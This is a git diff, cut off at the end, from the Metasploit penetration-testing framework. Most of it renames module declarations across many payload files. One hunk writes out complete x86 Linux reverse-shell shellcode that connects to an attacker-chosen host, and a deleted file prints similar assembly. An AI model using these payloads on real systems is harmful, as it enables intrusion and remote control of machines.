index 53411e9495..10afe263d7 100644 --- a/modules/payloads/singles/generic/debug_trap.rb +++ b/modules/payloads/singles/generic/debug_trap.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/payload/generic' -module Metasploit3 +module MetasploitModule CachedSize = 1 diff --git a/modules/payloads/singles/generic/shell_bind_tcp.rb b/modules/payloads/singles/generic/shell_bind_tcp.rb index 1f321f1d87..08d92ec255 100644 --- a/modules/payloads/singles/generic/shell_bind_tcp.rb +++ b/modules/payloads/singles/generic/shell_bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/payload/generic' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/generic/shell_reverse_tcp.rb b/modules/payloads/singles/generic/shell_reverse_tcp.rb index 20492e6537..f1fe1097fe 100644 --- a/modules/payloads/singles/generic/shell_reverse_tcp.rb +++ b/modules/payloads/singles/generic/shell_reverse_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/payload/generic' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/generic/tight_loop.rb b/modules/payloads/singles/generic/tight_loop.rb index c689218a3a..3ca11012b8 100644 --- a/modules/payloads/singles/generic/tight_loop.rb +++ b/modules/payloads/singles/generic/tight_loop.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/payload/generic' -module Metasploit3 +module MetasploitModule CachedSize = 2 diff --git a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb index 517cd5aaf5..fe0c9b1342 100644 --- a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 1593 diff --git a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb index e5201b9a61..a9118aa542 100644 --- a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 1501 diff --git a/modules/payloads/singles/java/shell_reverse_tcp.rb b/modules/payloads/singles/java/shell_reverse_tcp.rb index 5f760639e2..8a8cd0645a 100644 --- a/modules/payloads/singles/java/shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 7359 diff --git a/modules/payloads/singles/linux/armle/adduser.rb b/modules/payloads/singles/linux/armle/adduser.rb index d8b72f2391..7bee064a1a 100644 --- a/modules/payloads/singles/linux/armle/adduser.rb +++ b/modules/payloads/singles/linux/armle/adduser.rb @@ -14,7 +14,7 @@ require 'msf/core' # Adds a UID 0 user to /etc/passwd. # ### -module Metasploit3 +module MetasploitModule CachedSize = 119 diff --git a/modules/payloads/singles/linux/armle/exec.rb b/modules/payloads/singles/linux/armle/exec.rb index 88c3f9e5b9..30f6a53e8d 100644 --- a/modules/payloads/singles/linux/armle/exec.rb +++ b/modules/payloads/singles/linux/armle/exec.rb @@ -13,7 +13,7 @@ require 'msf/core' # Executes an arbitrary command. # ### -module Metasploit3 +module MetasploitModule CachedSize = 29 diff --git a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb index deac8e58a1..3f0721ce5d 100644 --- a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 208 diff --git a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb index 286b9c043e..a1f555ed66 100644 --- a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 172 diff --git a/modules/payloads/singles/linux/mipsbe/exec.rb b/modules/payloads/singles/linux/mipsbe/exec.rb index 0d7f26d720..4a68161bce 100644 --- a/modules/payloads/singles/linux/mipsbe/exec.rb +++ b/modules/payloads/singles/linux/mipsbe/exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 52 diff --git a/modules/payloads/singles/linux/mipsbe/reboot.rb b/modules/payloads/singles/linux/mipsbe/reboot.rb index f245836ec6..c0f93f5b2e 100644 --- a/modules/payloads/singles/linux/mipsbe/reboot.rb +++ b/modules/payloads/singles/linux/mipsbe/reboot.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 32 diff --git a/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb index f904e76eaf..e196576a12 100644 --- a/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 232 diff --git a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb index 36692d22dc..d1562f9cc4 100644 --- a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 184 diff --git a/modules/payloads/singles/linux/mipsle/exec.rb b/modules/payloads/singles/linux/mipsle/exec.rb index a2b1440a21..431b992815 100644 --- a/modules/payloads/singles/linux/mipsle/exec.rb +++ b/modules/payloads/singles/linux/mipsle/exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 52 diff --git a/modules/payloads/singles/linux/mipsle/reboot.rb b/modules/payloads/singles/linux/mipsle/reboot.rb index c479778455..bb93cdf2e0 100644 --- a/modules/payloads/singles/linux/mipsle/reboot.rb +++ b/modules/payloads/singles/linux/mipsle/reboot.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 32 diff --git a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb index 4beb549cac..81961f8a90 100644 --- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 232 diff --git a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb index 6d240561fa..74fa0975ed 100644 --- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 184 diff --git a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb index fe9f16e824..6769b0623b 100644 --- a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 223 diff --git a/modules/payloads/singles/linux/ppc/shell_find_port.rb b/modules/payloads/singles/linux/ppc/shell_find_port.rb index 32c5f401bb..2f12236ae8 100644 --- a/modules/payloads/singles/linux/ppc/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 171 diff --git a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb index 01c5f74c98..a883f94dfa 100644 --- a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 183 diff --git a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb index d460648361..d9d755c37e 100644 --- a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 223 diff --git a/modules/payloads/singles/linux/ppc64/shell_find_port.rb b/modules/payloads/singles/linux/ppc64/shell_find_port.rb index 61a29a463f..57ea9cd295 100644 --- a/modules/payloads/singles/linux/ppc64/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc64/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 171 diff --git a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb index a3ef4a702e..d838d9f724 100644 --- a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 183 diff --git a/modules/payloads/singles/linux/x64/exec.rb b/modules/payloads/singles/linux/x64/exec.rb index 69630f74bf..f42e589589 100644 --- a/modules/payloads/singles/linux/x64/exec.rb +++ b/modules/payloads/singles/linux/x64/exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 47 diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb index 06ab4b7e5c..c7a2765330 100644 --- a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 86 diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb index 7eaffef23f..07073dfe83 100644 --- a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb +++ b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 57 diff --git a/modules/payloads/singles/linux/x64/shell_find_port.rb b/modules/payloads/singles/linux/x64/shell_find_port.rb index 1ef8911778..9fc74d4381 100644 --- a/modules/payloads/singles/linux/x64/shell_find_port.rb +++ b/modules/payloads/singles/linux/x64/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 91 diff --git a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb index 860826c427..2b70a9dd60 100644 --- a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 74 diff --git a/modules/payloads/singles/linux/x86/adduser.rb b/modules/payloads/singles/linux/x86/adduser.rb index 064b5ca314..2a82a0d458 100644 --- a/modules/payloads/singles/linux/x86/adduser.rb +++ b/modules/payloads/singles/linux/x86/adduser.rb @@ -15,7 +15,7 @@ require 'msf/core' # Adds a UID 0 user to /etc/passwd. # ### -module Metasploit3 +module MetasploitModule CachedSize = 97 diff --git a/modules/payloads/singles/linux/x86/chmod.rb b/modules/payloads/singles/linux/x86/chmod.rb index 6ed4ea11a0..b2cf018252 100644 --- a/modules/payloads/singles/linux/x86/chmod.rb +++ b/modules/payloads/singles/linux/x86/chmod.rb @@ -10,7 +10,7 @@ require 'msf/core' # # Kris Katterjohn - 03/03/2008 ### -module Metasploit3 +module MetasploitModule CachedSize = 36 diff --git a/modules/payloads/singles/linux/x86/exec.rb b/modules/payloads/singles/linux/x86/exec.rb index d81ac237ad..d4a12e8d2a 100644 --- a/modules/payloads/singles/linux/x86/exec.rb +++ b/modules/payloads/singles/linux/x86/exec.rb @@ -13,7 +13,7 @@ require 'msf/core' # Executes an arbitrary command. # ### -module Metasploit3 +module MetasploitModule CachedSize = 43 diff --git a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb index ef79d117ed..9f1f1f351f 100644 --- a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/meterpreter_x86_linux' require 'msf/base/sessions/meterpreter_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb index a84023cfe1..8cb0c265f1 100644 --- a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_x86_linux' require 'msf/base/sessions/meterpreter_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/linux/x86/read_file.rb b/modules/payloads/singles/linux/x86/read_file.rb index 6d9a0a9b89..e51b91f598 100644 --- a/modules/payloads/singles/linux/x86/read_file.rb +++ b/modules/payloads/singles/linux/x86/read_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 63 diff --git a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb index af469cfebf..135d77a7d8 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 90 diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb index f6f90ce56f..c50a672018 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 78 diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb index 13c7b39632..e5e2a7f3f9 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 57 diff --git a/modules/payloads/singles/linux/x86/shell_find_port.rb b/modules/payloads/singles/linux/x86/shell_find_port.rb index 4961b81e72..f76634a2ff 100644 --- a/modules/payloads/singles/linux/x86/shell_find_port.rb +++ b/modules/payloads/singles/linux/x86/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 62 diff --git a/modules/payloads/singles/linux/x86/shell_find_tag.rb b/modules/payloads/singles/linux/x86/shell_find_tag.rb index 9a525d5e3b..3d2e84af78 100644 --- a/modules/payloads/singles/linux/x86/shell_find_tag.rb +++ b/modules/payloads/singles/linux/x86/shell_find_tag.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_tag' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 69 diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb index 3b1310ffe6..3e888459dc 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 68 @@ -20,56 +20,65 @@ module Metasploit3 super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', 'Description' => 'Connect back to attacker and spawn a command shell', - 'Author' => 'Ramon de C Valle', + 'Author' => ['Ramon de C Valle', 'joev'], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::CommandShellUnix, - 'Payload' => - { - 'Offsets' => - { - 'LHOST' => [ 25, 'ADDR' ], - 'LPORT' => [ 32, 'n' ], - }, - 'Payload' => - "\x31\xdb" +# xor ebx,ebx - "\xf7\xe3" +# mul ebx - "\x53" +# push ebx - "\x43" +# inc ebx - "\x53" +# push ebx - "\x6a\x02" +# push byte +0x2 - "\x89\xe1" +# mov ecx,esp - "\xb0\x66" +# mov al,0x66 - "\xcd\x80" +# int 0x80 - "\x93" +# xchg eax,ebx - "\x59" +# pop ecx - "\xb0\x3f" +# mov al,0x3f - "\xcd\x80" +# int 0x80 - "\x49" +# dec ecx - "\x79\xf9" +# jns 0x11 - "\x68\x7f\x00\x00\x01" +# push dword 0x100007f - "\x68\x02\x00\xbf\xbf" +# push dword 0xbfbf0002 - "\x89\xe1" +# mov ecx,esp - "\xb0\x66" +# mov al,0x66 - "\x50" +# push eax - "\x51" +# push ecx - "\x53" +# push ebx - "\xb3\x03" +# mov bl,0x3 - "\x89\xe1" +# mov ecx,esp - "\xcd\x80" +# int 0x80 - "\x52" +# push edx - "\x68\x2f\x2f\x73\x68" +# push dword 0x68732f2f - "\x68\x2f\x62\x69\x6e" +# push dword 0x6e69622f - "\x89\xe3" +# mov ebx,esp - "\x52" +# push edx - "\x53" +# push ebx - "\x89\xe1" +# mov ecx,esp - "\xb0\x0b" +# mov al,0xb - "\xcd\x80" # int 0x80 - } - )) + 'Session' => Msf::Sessions::CommandShellUnix + )) + + register_options([ + OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ]) + ]) + end + + def generate + # pad the shell path to a multiple of 4 with slashes + shell = datastore['CMD'] + remainder = shell.bytes.length % 4 + if remainder == 0 then remainder = 4 end + shell_padded = ("/" * (4-remainder)) + shell + + "\x31\xdb" +# xor ebx,ebx + "\xf7\xe3" +# mul ebx + "\x53" +# push ebx + "\x43" +# inc ebx + "\x53" +# push ebx + "\x6a\x02" +# push byte +0x2 + "\x89\xe1" +# mov ecx,esp + "\xb0\x66" +# mov al,0x66 (sys_socketcall) + "\xcd\x80" +# int 0x80 + "\x93" +# xchg eax,ebx + "\x59" +# pop ecx + "\xb0\x3f" +# mov al,0x3f (sys_dup2) + "\xcd\x80" +# int 0x80 + "\x49" +# dec ecx + "\x79\xf9" +# jns 0x11 + "\x68" + [IPAddr.new(datastore['LHOST'], Socket::AF_INET).to_i].pack('N') + # push ip addr + "\x68\x02\x00" + [datastore['LPORT'].to_i].pack('S>') + # push port + "\x89\xe1" +# mov ecx,esp + "\xb0\x66" +# mov al,0x66 (sys_socketcall) + "\x50" +# push eax + "\x51" +# push ecx + "\x53" +# push ebx + "\xb3\x03" +# mov bl,0x3 + "\x89\xe1" +# mov ecx,esp + "\xcd\x80" +# int 0x80 + "\x52" +# push edx + + # Split shellname into 4-byte words and push them one-by-one + # on to the stack + shell_padded.bytes.reverse.each_slice(4).map do |word| + "\x68" + word.reverse.pack('C*') + end.join + + + "\x89\xe3" +# mov ebx,esp + "\x52" +# push edx + "\x53" +# push ebx + "\x89\xe1" +# mov ecx,esp + "\xb0\x0b" +# mov al,0xb (execve) + "\xcd\x80" # int 0x80 end end diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb deleted file mode 100644 index d31c4ccc7c..0000000000 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb +++ /dev/null @@ -1,98 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'metasm' -require 'msf/core' -require 'msf/core/handler/reverse_tcp' -require 'msf/base/sessions/command_shell' -require 'msf/base/sessions/command_shell_options' - -module Metasploit3 - - CachedSize = 70 - - include Msf::Payload::Single - include Msf::Payload::Linux - include Msf::Sessions::CommandShellOptions - - def initialize(info = {}) - -# Remark: this function seems to be called a LOT, even before the shellcode is used. -# We would better implement some caching. - -# We decoded skape's shellcode by using irb -r metasm-shell -# and: puts shellcode.decode - super(merge_info(info, - 'Name' => 'Linux Command Shell, Reverse TCP Inline - Metasm Demo', - 'Description' => 'Connect back to attacker and spawn a command shell', - 'Author' => ['skape', 'Yoann Guillot', 'Julien Tinnes <julien[at]cr0.org>'], - 'License' => MSF_LICENSE, - 'Platform' => 'linux', - 'Arch' => ARCH_X86, - 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::CommandShellUnix, - 'Payload' => - { - 'Offsets' => - { - 'LHOST' => [ 0, 'ADDR' ], - 'LPORT' => [ 0, 'n' ], - }, - 'Assembly' => <<EOS - xor ebx, ebx ; @00000000 31db - push ebx ; @00000002 53 - inc ebx ; @00000003 43 - push ebx ; @00000004 53 - push 2 ; @00000005 6a02 - push 66h ; @00000007 6a66 - pop eax ; @00000009 58 - mov ecx, esp ; @0000000a 89e1 - int 80h ; @0000000c cd80 - xchg ebx, eax ; @0000000e 93 - pop ecx ; @0000000f 59 - - ; Xrefs: 0000000f, 00000015 -xref_00000010_uuidfdbd8: - mov al, 3fh ; @00000010 b03f - int 80h ; @00000012 cd80 - dec ecx ; @00000014 49 - jns xref_00000010_uuidfdbd8 ; @00000015 79f9 -- to 10h - - ; Xrefs: 00000015 - pop ebx ; @00000017 5b - pop edx ; @00000018 5a - push LHOST ; @00000019 687f000001 - push.i16 LPORT ; @0000001e 6668bfbf - inc ebx ; @00000022 43 - push bx ; @00000023 6653 - mov ecx, esp ; @00000025 89e1 - mov al, 66h ; @00000027 b066 - push eax ; @00000029 50 - push ecx ; @0000002a 51 - push ebx ; @0000002b 53 - mov ecx, esp ; @0000002c 89e1 - inc ebx ; @0000002e 43 - int 80h ; @0000002f cd80 - push edx ; @00000031 52 - push 68732f2fh ; @00000032 682f2f7368 - push 6e69622fh ; @00000037 682f62696e - mov ebx, esp ; @0000003c 89e3 - push edx ; @0000003e 52 - push ebx ; @0000003f 53 - mov ecx, esp ; @00000040 89e1 - mov al, 0bh ; @00000042 b00b - int 80h ; @00000044 cd80 -EOS - } - )) - end - - - # hardcode the size of the encoded payload, otherwise the shellcode is assembled during msf initialization - def size - #puts "size of #{name}: #{super()}" - 103 - end -end diff --git a/modules/payloads/singles/mainframe/shell_reverse_tcp.rb b/modules/payloads/singles/mainframe/shell_reverse_tcp.rb index 66c692ff96..b99eddb02e 100644 --- a/modules/payloads/singles/mainframe/shell_reverse_tcp.rb +++ b/modules/payloads/singles/mainframe/shell_reverse_tcp.rb @@ -13,7 +13,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/mainframe_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 339 diff --git a/modules/payloads/singles/nodejs/shell_bind_tcp.rb b/modules/payloads/singles/nodejs/shell_bind_tcp.rb index 8329175ca4..678f5b9742 100644 --- a/modules/payloads/singles/nodejs/shell_bind_tcp.rb +++ b/modules/payloads/singles/nodejs/shell_bind_tcp.rb @@ -12,7 +12,7 @@ require 'msf/core/payload/nodejs' require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' -module Metasploit3 +module MetasploitModule CachedSize = 456 diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb index b7cf44698d..7e4b4c4da1 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'msf/core/payload/nodejs' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' -module Metasploit3 +module MetasploitModule CachedSize = 488 diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb index 140ccdfa85..b882a0d084 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 516 diff --git a/modules/payloads/singles/osx/armle/shell_bind_tcp.rb b/modules/payloads/singles/osx/armle/shell_bind_tcp.rb index 278f72a760..8df43d658b 100644 --- a/modules/payloads/singles/osx/armle/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/armle/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 200 diff --git a/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb b/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb index 86aee3cfc5..408b2e1fd2 100644 --- a/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 152 diff --git a/modules/payloads/singles/osx/armle/vibrate.rb b/modules/payloads/singles/osx/armle/vibrate.rb index aaa15641e3..c5457a8d6d 100644 --- a/modules/payloads/singles/osx/armle/vibrate.rb +++ b/modules/payloads/singles/osx/armle/vibrate.rb @@ -7,7 +7,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 16 diff --git a/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb b/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb index 90c8ebed6f..d19475a5f0 100644 --- a/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 224 diff --git a/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb index 4973454069..93b6fd73c9 100644 --- a/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module 